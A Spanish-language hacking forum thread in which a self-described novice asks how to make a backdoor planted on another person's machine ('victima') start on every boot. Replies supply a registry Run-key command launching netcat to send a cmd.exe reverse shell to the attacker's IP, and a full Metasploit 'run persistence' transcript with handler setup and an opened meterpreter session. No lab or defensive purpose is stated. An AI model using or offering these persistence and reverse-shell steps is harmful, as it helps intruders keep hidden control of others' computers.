[SOLUCIONADO] Backdoor autorun ayuda!!!

Iniciado por pelumon, Octubre 01, 2013, 07:56:18 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Octubre 01, 2013, 07:56:18 PM Ultima modificación: Agosto 08, 2014, 08:17:04 PM por Expermicid
que tal banda bueno pues les cuanto que pude crear un backdoor e instalarlo en otra maquina con red diferente y todo marcha bien, lo que quiero saber es como lo instalo para que inicie en procesos cada que se prenda y apague la computadora ya intente con run presistence pero lo que no se es si se pone la ip de la maquina victima la externa o la local ya que en armitage me salen las 2, de echo eh intentado con las 2 pero no eh tenid exito gracias bandda salu2.....
Octubre 01, 2013, 10:22:02 PM #1
Lo que podes hacer si ya tenes acceso a la maquina remota es decargar netcat y agregar la siguiente entrada al registro de windows para que el binario se ejecute cada vez que la maquina se inicie

Código: dos
reg add HKLM\SOFTWARE\microsoft\windows\currentversion\run /v backdoor /d "/ruta/nc.exe -vv tuip puerto -e cmd.exe"


Reemplaza /ruta/nc.exe por el destino original donde se va a encontrar el netcat, asi mismo con "tuip" y "puerto" por los valores correspondientes, Luego te pones a escuchar para obtener la shell inversa.



Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Twitter: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Octubre 04, 2013, 01:38:39 AM #2
me comunico con la maquina con netcat y esto me abrira la sell?? pero despues, hehehe perdon aun soy novato
Octubre 04, 2013, 10:57:40 AM #3
Antes de cerrar la sesión de meterpreter tenias que subir el troyano, exe, payload o como le quieras llamar, para que cuando entres a la shell, lo ejecutes, y se te abra la sesión.

Skype: trollmine99
Octubre 04, 2013, 05:45:50 PM #4
yo creo que tienes que poner la ip atacante no la víctima

escribe run persistence -h para ver las opciones
escribiré run persistence -U -i 5 -p PUERTO -r IP

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.254.128
  • Running Persistance Script
  • Resource file for cleanup created at /root/.msf4/logs/persistence/DARKAN-PC_20131004.1419/DARKAN-PC_20131004.1419.rc
  • Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.254.128 LPORT=4444
  • Persistent agent script is 613979 bytes long
  • Persistent Script written to C:\Users\Darkan\AppData\Local\Temp\SvTZOaDOD.vbs
  • Executing script C:\Users\Darkan\AppData\Local\Temp\SvTZOaDOD.vbs
  • Agent executed with PID 6836
  • Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cWizKCJgKCz
  • Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cWizKCJgKCz

    reiniciar..

    msf > use exploit/multi/handler
    msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf  exploit(handler) > set LHOST 192.168.254.128
    LHOST => 192.168.254.128
    msf  exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf  exploit(handler) > exploit
  • Started reverse handler on 192.168.254.128:4444
  • Starting the payload handler...
  • Sending stage (752128 bytes) to 192.168.254.1
  • Meterpreter session 1 opened (192.168.254.128:4444 -> 192.168.254.1:7510) at 2013-10-04 16:19:33 -0400

    meterpreter >

    y listo
Octubre 09, 2013, 06:03:02 PM #5
Si la pc victima esta encendida primero que la atante aun Asi se puede conectar o nesesita primero estar exploit ?
Octubre 09, 2013, 06:03:57 PM #6
Gracias por contestar salu2  8)
Imprimir
Ir Arriba Páginas1
Acciones del Usuario